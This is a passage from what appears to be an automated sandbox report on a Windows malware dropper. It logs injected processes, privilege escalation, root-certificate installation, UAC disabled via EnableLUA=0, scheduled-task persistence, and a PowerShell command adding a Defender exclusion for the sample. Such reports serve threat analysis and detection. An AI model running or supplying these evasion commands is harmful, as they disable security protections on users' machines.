72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe N/A
N/A N/A C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\cmd.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\cmd.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\syswow64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4436 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4436 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4436 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1596 wrote to memory of 3460 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe
PID 1596 wrote to memory of 3460 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe
PID 1596 wrote to memory of 3460 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe
PID 1596 wrote to memory of 1536 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe
PID 1596 wrote to memory of 1536 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe
PID 1596 wrote to memory of 1536 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe
PID 1596 wrote to memory of 4892 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe
PID 1596 wrote to memory of 4892 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe
PID 1596 wrote to memory of 4892 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe
PID 1596 wrote to memory of 3252 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe
PID 1596 wrote to memory of 3252 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe
PID 1596 wrote to memory of 4204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe
PID 1596 wrote to memory of 4204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe
PID 1596 wrote to memory of 4204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe
PID 1596 wrote to memory of 4992 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe
PID 1596 wrote to memory of 4992 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe
PID 1596 wrote to memory of 4992 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe
PID 1596 wrote to memory of 3256 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe
PID 1596 wrote to memory of 3256 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe
PID 1596 wrote to memory of 3256 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe
PID 1596 wrote to memory of 4640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe
PID 1596 wrote to memory of 4640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe
PID 1596 wrote to memory of 4640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe
PID 1596 wrote to memory of 2512 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 1596 wrote to memory of 2512 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 1596 wrote to memory of 2512 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 1596 wrote to memory of 3944 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe
PID 1596 wrote to memory of 3944 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe
PID 1596 wrote to memory of 3944 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe
PID 1596 wrote to memory of 2408 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe
PID 1596 wrote to memory of 2408 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe
PID 4892 wrote to memory of 560 N/A C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp
PID 4892 wrote to memory of 560 N/A C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp
PID 4892 wrote to memory of 560 N/A C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp
PID 1536 wrote to memory of 4184 N/A C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1536 wrote to memory of 4184 N/A C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1536 wrote to memory of 4184 N/A C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2512 wrote to memory of 4584 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 2512 wrote to memory of 4584 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 2512 wrote to memory of 4584 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 3256 wrote to memory of 5032 N/A C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe C:\Windows\system32\backgroundTaskHost.exe
PID 3256 wrote to memory of 5032 N/A C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe C:\Windows\system32\backgroundTaskHost.exe
PID 3256 wrote to memory of 5032 N/A C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe C:\Windows\system32\backgroundTaskHost.exe
PID 2512 wrote to memory of 2228 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe
PID 2512 wrote to memory of 2228 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe
PID 2512 wrote to memory of 2228 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe
PID 5032 wrote to memory of 2644 N/A C:\Windows\system32\backgroundTaskHost.exe C:\Users\Admin\AppData\Local\Temp\is-6IF8E.tmp\_isetup\_setup64.tmp
PID 5032 wrote to memory of 2644 N/A C:\Windows\system32\backgroundTaskHost.exe C:\Users\Admin\AppData\Local\Temp\is-6IF8E.tmp\_isetup\_setup64.tmp
PID 2512 wrote to memory of 4540 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 2512 wrote to memory of 4540 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 2512 wrote to memory of 4540 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 4184 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4184 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe

"C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe

"C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe"

C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe

"C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe"

C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe

"C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe"

C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe

"C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe"

C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe

"C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe"

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

"C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe" --silent --allusers=0

C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe

"C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe"

C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe

"C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe

"C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe"

C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe

"C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe"

C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp

